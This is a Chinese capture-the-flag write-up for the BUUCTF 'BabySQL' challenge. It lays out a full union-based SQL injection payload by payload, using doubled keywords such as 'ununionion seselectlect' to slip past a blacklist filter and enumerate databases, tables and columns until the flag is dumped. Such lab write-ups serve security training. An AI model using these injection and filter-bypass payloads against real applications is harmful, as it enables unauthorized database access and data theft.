记一次经典SQL双写绕过题目[极客大挑战 2019]BabySQL 1
  rKeEjcARIgc2 2023年11月19日 21 0

题目环境:<br />image.png

作者已经描述进行了严格的过滤 做好心理准备进行迎接

判断注入类型

admin 1'

字符型注入<br />image.png<br />万能密码注入

admin 1' or '1'='1

报错<br />image.png

已经是字符型注入了,所以的话只有or这里存在了过滤 联想到buuctf里面还没有碰到双写绕过的题目 所以这里斗胆试一下使用双写绕过

1' oorr '1'='1<br />成功<br />image.png<br />使用堆叠注入爆数据库<br />1';show database();<br />报错<br />image.png<br />抛弃堆叠注入<br />尝试联合注入

联合注入末尾需要使用#号键进行注释#号后面的命令,避免报错

这里值得提一下schema和schemata和常见命令的理解

SCHEMA在MySQL中是数据库,SCHEMATA表用来提供有关数据库的信息。 union select就是联合注入,联合查询的意思 from来自 information_schema是MySQL自带的数据库 group_concat将值连接起来 where来自那个数据库或数据表等等

爆列数(关键命令采用双写进行绕过)<br />1' oorrder bbyy 4#<br />image.png<br />1' oorrder bbyy 3#<br />image.png

可知列数只有3列

查位(关键命令采用双写进行绕过)<br />1' ununionion seselectlect 1,2,3#<br />image.png<br />爆数据库(关键命令采用双写进行绕过)<br />1' ununionion seselectlect 1,database(),3#<br />image.png<br />采用第三列进行注入<br />爆所有数据库(关键命令采用双写进行绕过)<br />1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#<br />image.png

根据常识ctf数据库里面存在flag的可能更大,故选择ctf数据库

爆ctf数据库里面的数据表<br />1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#

因为ctf在schema里面所有这里就是table_schema,schema里面的数据库ctf里面的数据表

得到Flag数据表<br />image.png<br />爆Flag数据表里面的字段<br />1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'#<br />得到flag字段<br />image.png<br />爆flag字段内容<br />1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#

ctf.Flag意思就是ctf数据库里面的Flag数据表

image.png<br />得到flag:<br />flag{fbd18420-cab7-4d6e-8fb9-f8ea6febda61}

原文链接:https://blog.csdn.net/m0_73734159/article/details/134277587?csdn_share_tail=%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22134277587%22%2C%22source%22%3A%22m0_73734159%22%7D

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月19日 0

暂无评论

推荐阅读
  7o0lrI1v52Tn   2023年12月10日   31   0   0 phpCTFweb
rKeEjcARIgc2